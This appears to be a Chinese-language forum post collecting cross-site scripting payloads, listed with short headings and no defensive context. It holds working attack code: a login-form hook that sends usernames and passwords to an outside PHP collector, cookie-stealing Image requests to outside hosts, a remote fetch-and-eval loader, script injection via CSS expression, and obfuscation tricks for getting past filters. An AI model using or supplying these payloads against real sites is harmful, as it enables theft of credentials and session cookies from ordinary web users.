http://xss.betaslife.com/viewthread.php?tid=2

1.最短的动态插入JS.
代码:
<x/**/style=xss:expression(document.appendChild(document.createElement('script')).src='xss.js')>

2.获取表单密码.
代码:
window.onload=function(){document.forms['login'].onsubmit=function(){var a=new Image();a.src="http://127.0.0.1/loveshell.php"+this.username.value+"&"+this.password.value;this.submit();}};
代码:
document.forms[0].elements["login"].onclick=function(){alert(/xss/);}

document.forms['login'].onsubmit=function(){alert(/xss/)}};

3.转码.
代码:
eval(String.fromCharCode(88,83,83))

eval(unescape(alert%28/xss/%29))

4.获取COOKIE
代码:
c=new Image();c.src='http://xss/cookie.php?c='+document.cookie;
//不允许空格的情况
代码:
i=new/**/Image();i.src='http://192.168.3.10/cookie.php?c='+document.cookie;

5.AJAX EVAL CODE
代码:
a=new ActiveXObject('Microsoft.XMLHTTP');a.Open('get','http://xss-poc.blog.sohu.com/31406970.html',false);a.send();b=a.responseText;eval(unescape(b.substring(b.indexOf('--|')+3,b.indexOf('|--'))));

6.DOM EVAL CODE

代码:
t=document.body.innerHTML;s=t.indexOf('+++')+3;e=t.indexOf('---');eval(unescape(t.substring(s,e)));

7.最短XSS[code]<script>/**/z='ale'/**/+"rt"/**/+"()";/**/eval(z)/**/</script>

<script>/*
*/z='ale'/*
*/+"rt"/*
*/+"()";/*
*/eval(z)/*
*/</script>[/cod